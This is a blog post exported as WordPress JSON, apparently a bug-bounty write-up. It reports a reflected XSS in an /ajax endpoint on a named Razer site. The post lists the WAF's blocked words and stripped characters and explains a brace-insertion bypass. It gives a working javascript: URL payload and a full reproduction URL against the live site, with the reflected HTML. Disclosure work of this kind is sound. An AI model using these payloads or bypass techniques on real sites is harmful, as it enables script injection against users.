{"id":221,"date":"2024-01-24T19:06:00","date_gmt":"2024-01-24T12:06:00","guid":{"rendered":"https:\/\/n45ht.or.id\/blog\/?p=221"},"modified":"2025-10-14T22:53:24","modified_gmt":"2025-10-14T15:53:24","slug":"bypassing-razers-waf-for-xss","status":"publish","type":"post","link":"https:\/\/n45ht.or.id\/blog\/bypassing-razers-waf-for-xss\/","title":{"rendered":"Bypassing Razer&#8217;s WAF for XSS"},"content":{"rendered":"\n<p>While testing Razer\u2019s web application, I identified an <strong>XSS vulnerability<\/strong> in their <code>\/ajax<\/code> endpoint. The issue arises due to insufficient validation of the <code>URL<\/code> parameter, allowing JavaScript execution despite filtering attempts. This write-up outlines how I discovered the parameter using Arjun, crafted a bypass for their filters and successfully executed a proof of concept (PoC).<\/p>\n\n\n\n<p>To begin, I used <strong>Arjun<\/strong>, a tool designed to identify query parameters that web applications accept and process. Running the following command revealed the presence of the <code>URL<\/code> parameter:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"HTML\" class=\"language-HTML\">arjun -u https:\/\/www2.razer.com\/ajax<\/code><\/pre>\n\n\n\n<p>Arjun reported that the <code>URL<\/code> parameter was being processed by the server. Further testing revealed that its value was reflected in the response.<\/p>\n\n\n\n<p>When passing a value to the <code>URL<\/code> parameter, the application rendered the following HTML response:<\/p>\n\n\n\n<p><strong>Request:<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"HTML\" class=\"language-HTML\">https:\/\/www2.razer.com\/ajax?URL=https:\/\/google.com<\/code><\/pre>\n\n\n\n<p><strong>Response:<\/strong><\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#2e3440ff\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" style=\"color:#d8dee9ff;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><pre class=\"code-block-pro-copy-button-pre\" aria-hidden=\"true\"><textarea class=\"code-block-pro-copy-button-textarea\" tabindex=\"-1\" aria-hidden=\"true\" readonly>&lt;html>\n&lt;head>\n&lt;meta http-equiv='Content-Type' content='text\/html; charset=utf-8'\/>\n&lt;title>Redirect&lt;\/title>\n&lt;\/head>\n&lt;body>\n&lt;p>To proceed to the URL you have requested, click the link below:&lt;\/p>\n&lt;p>&lt;a href='https:\/\/google.com'>https:\/\/google.com&lt;\/a>&lt;\/p>\n&lt;\/body>\n&lt;\/html><\/textarea><\/pre><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M4.5 12.75l6 6 9-13.5\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M16.5 8.25V6a2.25 2.25 0 00-2.25-2.25H6A2.25 2.25 0 003.75 6v8.25A2.25 2.25 0 006 16.5h2.25m8.25-8.25H18a2.25 2.25 0 012.25 2.25V18A2.25 2.25 0 0118 20.25h-7.5A2.25 2.25 0 018.25 18v-1.5m8.25-8.25h-6a2.25 2.25 0 00-2.25 2.25v6\"><\/path><\/svg><\/span><pre class=\"shiki nord\" style=\"background-color: #2e3440ff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #81A1C1\">&lt;html&gt;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #81A1C1\">&lt;head&gt;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #81A1C1\">&lt;meta<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #8FBCBB\">http-equiv<\/span><span style=\"color: #ECEFF4\">=<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #A3BE8C\">Content-Type<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #8FBCBB\">content<\/span><span style=\"color: #ECEFF4\">=<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #A3BE8C\">text\/html; charset=utf-8<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #81A1C1\">\/&gt;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #81A1C1\">&lt;title&gt;<\/span><span style=\"color: #D8DEE9FF\">Redirect<\/span><span style=\"color: #81A1C1\">&lt;\/title&gt;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #81A1C1\">&lt;\/head&gt;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #81A1C1\">&lt;body&gt;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #81A1C1\">&lt;p&gt;<\/span><span style=\"color: #D8DEE9FF\">To proceed to the URL you have requested, click the link below:<\/span><span style=\"color: #81A1C1\">&lt;\/p&gt;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #81A1C1\">&lt;p&gt;&lt;a<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #8FBCBB\">href<\/span><span style=\"color: #ECEFF4\">=<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #A3BE8C\">https:\/\/google.com<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #81A1C1\">&gt;<\/span><span style=\"color: #D8DEE9FF\">https:\/\/google.com<\/span><span style=\"color: #81A1C1\">&lt;\/a&gt;&lt;\/p&gt;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #81A1C1\">&lt;\/body&gt;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #81A1C1\">&lt;\/html&gt;<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<p>This indicated that the server did not validate the protocol or sanitize the input properly. I tested various protocols, including <code>javascript:\/\/<\/code>, which allowed me to inject JavaScript. However, initial attempts at executing JavaScript code encountered several backend restrictions.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Understanding the Filter Mechanism<\/h3>\n\n\n\n<p>The backend implemented some basic filtering:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Blocked Words<\/strong>: The backend blocked words like <code>window<\/code> , <code>alert<\/code> , <code>eval<\/code>, and <code>error<\/code>.<\/li>\n\n\n\n<li><strong>Removed Characters<\/strong>: It also removed <code>{<\/code> , <code>}<\/code> , <code>(<\/code> , <code>)<\/code> , <code>`<\/code> characters from the input.<\/li>\n<\/ul>\n\n\n\n<p>Testing an invalid URL containing <code>alert<\/code>, for example, returned a <code>500 Internal Server Error<\/code>:<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">Request:<\/h4>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"HTML\" class=\"language-HTML\">https:\/\/www2.razer.com\/ajax?URL=https:\/\/alert.com<\/code><\/pre>\n\n\n\n<h4 class=\"wp-block-heading\">Response:<\/h4>\n\n\n\n<figure class=\"wp-block-image aligncenter size-large is-resized\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"510\" src=\"https:\/\/n45ht.or.id\/blog\/wp-content\/uploads\/2024\/12\/www2.razer_.com1-1-1024x510.png\" alt=\"\" class=\"wp-image-222\" style=\"width:402px;height:auto\" srcset=\"https:\/\/n45ht.or.id\/blog\/wp-content\/uploads\/2024\/12\/www2.razer_.com1-1-1024x510.png 1024w, https:\/\/n45ht.or.id\/blog\/wp-content\/uploads\/2024\/12\/www2.razer_.com1-1-300x149.png 300w, https:\/\/n45ht.or.id\/blog\/wp-content\/uploads\/2024\/12\/www2.razer_.com1-1-768x382.png 768w, https:\/\/n45ht.or.id\/blog\/wp-content\/uploads\/2024\/12\/www2.razer_.com1-1.png 1366w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\">Bypassing the Filter<\/h3>\n\n\n\n<p>To bypass the restrictions, I discovered that embedding <code>{}<\/code> characters <em>inside<\/em> blocked words would bypass the backend&#8217;s WAF. For example, by splitting <code>alert<\/code> into <code>a{ler}t<\/code>, I was able to reintroduce the forbidden characters and evade detection.<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">Request:<\/h4>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"HTML\" class=\"language-HTML\">https:\/\/www2.razer.com\/ajax?URL=https:\/\/a{ler}t.com<\/code><\/pre>\n\n\n\n<h4 class=\"wp-block-heading\">Response:<\/h4>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img loading=\"lazy\" decoding=\"async\" width=\"581\" height=\"193\" src=\"https:\/\/n45ht.or.id\/blog\/wp-content\/uploads\/2024\/12\/www2.razer_.com2-1.png\" alt=\"\" class=\"wp-image-224\" style=\"width:489px;height:auto\" srcset=\"https:\/\/n45ht.or.id\/blog\/wp-content\/uploads\/2024\/12\/www2.razer_.com2-1.png 581w, https:\/\/n45ht.or.id\/blog\/wp-content\/uploads\/2024\/12\/www2.razer_.com2-1-300x100.png 300w\" sizes=\"auto, (max-width: 581px) 100vw, 581px\" \/><\/figure>\n\n\n\n<p>This confirmed that the WAF could be bypassed using encoded or obfuscated characters. With this insight, I proceeded to craft a more advanced payload.<\/p>\n\n\n\n<p>To bypass these restrictions, I encoded the <code>{<\/code> and <code>}<\/code> characters by embedding them inside blocked words. This allowed me to reintroduce the forbidden characters while bypassing the filters.<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">Final Payload:<\/h4>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"HTML\" class=\"language-HTML\">javascript:\/\/%250athrow%20on{err}o}r=a{ler}t,1337<\/code><\/pre>\n\n\n\n<p>This payload uses:<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li><strong><code>javascript:\/\/<\/code> Protocol<\/strong>: Allows JavaScript execution.<\/li>\n\n\n\n<li><strong>Encoded Characters<\/strong>: <code>%250a<\/code> for a newline and <code>{}<\/code> embedded inside blocked words to bypass the filter.<\/li>\n\n\n\n<li><strong>Triggering Code<\/strong>: Assigning <code>onerror<\/code> to execute an alert with the value <code>1337<\/code>.<\/li>\n<\/ol>\n\n\n\n<h3 class=\"wp-block-heading\">Steps to Reproduce<\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Open the vulnerable URL with the crafted payload:<\/li>\n<\/ul>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"HTML\" class=\"language-HTML\">https:\/\/www2.razer.com\/ajax?URL=javascript:\/\/%250athrow%20on{err}o}r=a{ler}t,1337<\/code><\/pre>\n\n\n\n<ul class=\"wp-block-list\">\n<li>The server responds with the following HTML:<\/li>\n<\/ul>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#2e3440ff\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" style=\"color:#d8dee9ff;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><pre class=\"code-block-pro-copy-button-pre\" aria-hidden=\"true\"><textarea class=\"code-block-pro-copy-button-textarea\" tabindex=\"-1\" aria-hidden=\"true\" readonly>&lt;html>\n&lt;head>\n&lt;meta http-equiv='Content-Type' content='text\/html; charset=utf-8'\/>\n&lt;title>Redirect&lt;\/title>\n&lt;\/head>\n&lt;body>\n&lt;p>To proceed to the URL you have requested, click the link below:&lt;\/p>\n&lt;p>&lt;a href='javascript:\/\/%0athrow%20onerror=alert,1337'>javascript:\/\/%0athrow onerror=alert,1337&lt;\/a>&lt;\/p>\n&lt;\/body>\n&lt;\/html><\/textarea><\/pre><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M4.5 12.75l6 6 9-13.5\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M16.5 8.25V6a2.25 2.25 0 00-2.25-2.25H6A2.25 2.25 0 003.75 6v8.25A2.25 2.25 0 006 16.5h2.25m8.25-8.25H18a2.25 2.25 0 012.25 2.25V18A2.25 2.25 0 0118 20.25h-7.5A2.25 2.25 0 018.25 18v-1.5m8.25-8.25h-6a2.25 2.25 0 00-2.25 2.25v6\"><\/path><\/svg><\/span><pre class=\"shiki nord\" style=\"background-color: #2e3440ff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #81A1C1\">&lt;html&gt;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #81A1C1\">&lt;head&gt;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #81A1C1\">&lt;meta<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #8FBCBB\">http-equiv<\/span><span style=\"color: #ECEFF4\">=<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #A3BE8C\">Content-Type<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #8FBCBB\">content<\/span><span style=\"color: #ECEFF4\">=<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #A3BE8C\">text\/html; charset=utf-8<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #81A1C1\">\/&gt;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #81A1C1\">&lt;title&gt;<\/span><span style=\"color: #D8DEE9FF\">Redirect<\/span><span style=\"color: #81A1C1\">&lt;\/title&gt;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #81A1C1\">&lt;\/head&gt;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #81A1C1\">&lt;body&gt;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #81A1C1\">&lt;p&gt;<\/span><span style=\"color: #D8DEE9FF\">To proceed to the URL you have requested, click the link below:<\/span><span style=\"color: #81A1C1\">&lt;\/p&gt;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #81A1C1\">&lt;p&gt;&lt;a<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #8FBCBB\">href<\/span><span style=\"color: #ECEFF4\">=<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #A3BE8C\">javascript:\/\/%0athrow%20onerror=alert,1337<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #81A1C1\">&gt;<\/span><span style=\"color: #D8DEE9FF\">javascript:\/\/%0athrow onerror=alert,1337<\/span><span style=\"color: #81A1C1\">&lt;\/a&gt;&lt;\/p&gt;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #81A1C1\">&lt;\/body&gt;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #81A1C1\">&lt;\/html&gt;<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Click the displayed payload link on the rendered page.<\/li>\n\n\n\n<li>The XSS payload is executed, triggering an alert box.<\/li>\n<\/ul>\n\n\n\n<h4 class=\"wp-block-heading\">Screenshot:<\/h4>\n\n\n\n<figure class=\"wp-block-image aligncenter size-large is-resized\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"504\" src=\"https:\/\/n45ht.or.id\/blog\/wp-content\/uploads\/2024\/12\/www2.razer_.com3-1-1024x504.png\" alt=\"\" class=\"wp-image-223\" style=\"width:469px;height:auto\" srcset=\"https:\/\/n45ht.or.id\/blog\/wp-content\/uploads\/2024\/12\/www2.razer_.com3-1-1024x504.png 1024w, https:\/\/n45ht.or.id\/blog\/wp-content\/uploads\/2024\/12\/www2.razer_.com3-1-300x148.png 300w, https:\/\/n45ht.or.id\/blog\/wp-content\/uploads\/2024\/12\/www2.razer_.com3-1-768x378.png 768w, https:\/\/n45ht.or.id\/blog\/wp-content\/uploads\/2024\/12\/www2.razer_.com3-1.png 1366w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\">Reference:<\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li><a href=\"https:\/\/portswigger.net\/research\/xss-without-parentheses-and-semi-colons\">https:\/\/portswigger.net\/research\/xss-without-parentheses-and-semi-colons<\/a><\/li>\n<\/ul>\n\n\n\n<p><\/p>\n","protected":false},"excerpt":{"rendered":"<p>While testing Razer\u2019s web application, I identified an XSS vulnerability in their \/ajax endpoint. The issue arises due to insufficient validation of the URL parameter, allowing JavaScript execution despite filtering attempts. This write-up outlines how I discovered the parameter using Arjun, crafted a bypass for their filters and successfully executed a proof of concept (PoC). [&hellip;]<\/p>\n","protected":false},"author":3,"featured_media":320,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[21],"tags":[23,9,8],"class_list":["post-221","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-research","tag-bug-bounty","tag-cross-site-scripting","tag-xss"],"_links":{"self":[{"href":"https:\/\/n45ht.or.id\/blog\/wp-json\/wp\/v2\/posts\/221","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/n45ht.or.id\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/n45ht.or.id\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/n45ht.or.id\/blog\/wp-json\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"https:\/\/n45ht.or.id\/blog\/wp-json\/wp\/v2\/comments?post=221"}],"version-history":[{"count":8,"href":"https:\/\/n45ht.or.id\/blog\/wp-json\/wp\/v2\/posts\/221\/revisions"}],"predecessor-version":[{"id":319,"href":"https:\/\/n45ht.or.id\/blog\/wp-json\/wp\/v2\/posts\/221\/revisions\/319"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/n45ht.or.id\/blog\/wp-json\/wp\/v2\/media\/320"}],"wp:attachment":[{"href":"https:\/\/n45ht.or.id\/blog\/wp-json\/wp\/v2\/media?parent=221"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/n45ht.or.id\/blog\/wp-json\/wp\/v2\/categories?post=221"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/n45ht.or.id\/blog\/wp-json\/wp\/v2\/tags?post=221"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}